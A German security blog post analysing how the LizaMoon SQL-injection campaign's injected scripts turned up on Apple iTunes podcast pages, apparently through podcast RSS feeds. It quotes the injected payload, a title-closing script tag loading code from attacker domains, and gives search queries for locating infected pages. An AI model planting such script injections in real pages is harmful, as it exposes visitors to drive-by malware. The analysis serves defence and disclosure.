Skip to content

LizaMoon auf Apples iTunes-Seiten

"LizaMoon" wurde auch auf Apples iTunes-Seiten gefunden. Nun verwendet Apple kaum ASP.NET für seine Websites, und der SQL-Injection-Massenangriff richtet sich nur gegen ASP.NET-Anwendungen mit Microsofts SQL Server. Wie kommt der Schadcode also auf Apples Seiten?

itunes.apple.com - Von Hinten durch die Brust ins Auge

Unter den ersten Opfern von LizaMoon waren laut Websense auch einige itunes.apple.com-URLs. Websense vermutet, dass der Schadcode über die RSS/XML-Feeds, über die Podcast-Produzenten neue Folgen ankündigen, auf den Server gelangte. Die RSS/XML-Feed wären dann von bereits kompromittierten Servern an den iTunes-Server gesendet worden.

Dort endete der von Websense beobachtete Angriff dann jedoch, da die iTunes-Website die Script-Tags durch umkodieren der <- und >-Zeichen in ihre HTML-Entities &lt; und &gt; unbrauchbar macht. Mit anderen Worten: Der Schutz vor XSS-Angriffen hat funktioniert. Jedenfalls in diesen Fällen.

Der Schutz, der versagte?

Leider scheint der XSS-Filter aber nicht immer zu funktionieren. Im GFI LABS Blog wurden ebenfalls infizierte iTunes-Seiten gemeldet, und auch wenn es auf dem ersten Blick so aussieht, was wäre es falscher Alarm und der eingeschleuste Code wäre auch dort unbrauchbar gemacht worden (zumindest in den gezeigten Screenshots sind die <- und >-Zeichen als HTML-Entities kodiert), trügt der Schein. Wie ich mich mit eigenen Augen überzeugen konnte, enthalten alle drei genannten Seiten,
itunes.apple.com/us/podcast/turkish/id161320202,
itunes.apple.com/pl/podcast/cuneyt/id152442304 und
itunes.apple.com/kr/podcast/belgesel-title-script-src/id206817953,
den Schadcode auch in zumindest theoretisch funktionsfähiger Form:

iTunes-Seite mit 'scharfen' Schadcode

Zum Glück steht das
</title><script src=http://milapop.com/ur.php></script>
auf den ersten beiden Seiten an Stellen im Sourcecode, an denen es keinen Schaden anrichten kann (in einem div-Tag), und der Server mit dem Schadcode ist auch nicht zu erreichen. Aber das ist beides wirklich nur Glück. Ich glaube nicht, dass Apple XSS-Code nur da durch Umkodieren unbrauchbar machen möchte, wo er evtl. Schaden anrichten kann.

Auf der dritten genannten Seite gibt es sehr viel mehr "scharfe" Fundstellen des Schadcodes
</title><script src=http://books-loader.info/ur.php></script>
, aber auch hier befinden sie sich alle an der "falschen" Stelle (zwei Mal in Meta-Tags, mehrmals in tr-Tags und in einem div-Tag), außerdem ist auch hier der Server für den Schadcode nicht mehr erreichbar.

iTunes-Seite mit 'scharfen' Schadcode

Wie es auf den Websites der jeweiligen Podcast-Produzenten aussieht, habe ich mir nicht mehr genauer angesehen. Irgendwo muss der Schadcode ja in die RSS/XML-Feeds gelangt sein...

Diese drei sind nur die Spitze des Eisbergs

Die drei von GFI gefundenen URL sind nur die Spitze eines (allerdings relativ kleinen) Eisbergs: Die Google-Suche nach src=http://milapop.com/ur.php site:apple.com lieferte 27 Fundstellen, die nach src=http://books-loader.info/ur.php site:apple.com 8. Aber es gibt ja noch etliche Domains, die im Rahmen der LizaMoon-Angriffe zum Einsatz kamen. src=http://lizamoon.com/ur.php site:apple.com zum Beispiel liefert weitere 37 Fundstellen (alle Ergebnisse vom 7. April 2011, 11:30 Uhr).

Googel-Suche nach milapop.com auf apple.com

Googel-Suche nach books-loader.info auf apple.com

Googel-Suche nach lizamoon.com auf apple.com

Das ist wohl ein klarer Fall von "Cupertino, you have a problem". Eigentlich sollte man denen wohl Bescheid sagen. Nach negativen Erfahrungen in der Vergangenheit spare ich mir die Mühe aber.

Carsten Eilers


Übersicht über alle Artikel zum Thema

Drive-by-Infektionen - Gefahren drohen überall
Drive-by-Infektionen durch SQL-Injection vorbereitet
Drive-by-Infektionen: So kommt der Schadcode auf den Server
Drive-by-Infektionen - Vom Server auf den Client
Drive-by-Infektionen - Ein Blick auf die Exploits
Drive-by-Infektionen erkennen und abwehren
LizaMoon - Massenhack mit minimalen Folgen
Aktuelles: LizaMoon auf Apples iTunes-Seiten
Drive-by-Infektionen über präparierte Werbung

Trackbacks

Dipl.-Inform. Carsten Eilers am : Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!

Vorschau anzeigen
Wiederholungen, nichts als Wiederholungen. Nein, ich meine nicht das TV-Programm im Sommer(loch). Auch die Cyberkriminellen haben in letzter Zeit auf Bewährtes gesetzt: Clickjacking gegen Flash, Massen-SQL-Injection und Code-Recycling sind ang

Dipl.-Inform. Carsten Eilers am : SQL-Injection im Schnelldurchlauf

Vorschau anzeigen
Laut dem Cloud-Hosting-Anbieter FireHost ist die Zahl der erkannten SQL-Injection-Angriffe zwischen April und Juni 2012 um 69% gestiegen. Während im 1. Quartal 2012 &quot;nur&quot; 277.770 Angriffe abgewehrt wurden, waren es im 2. Quartal 469.983 Angr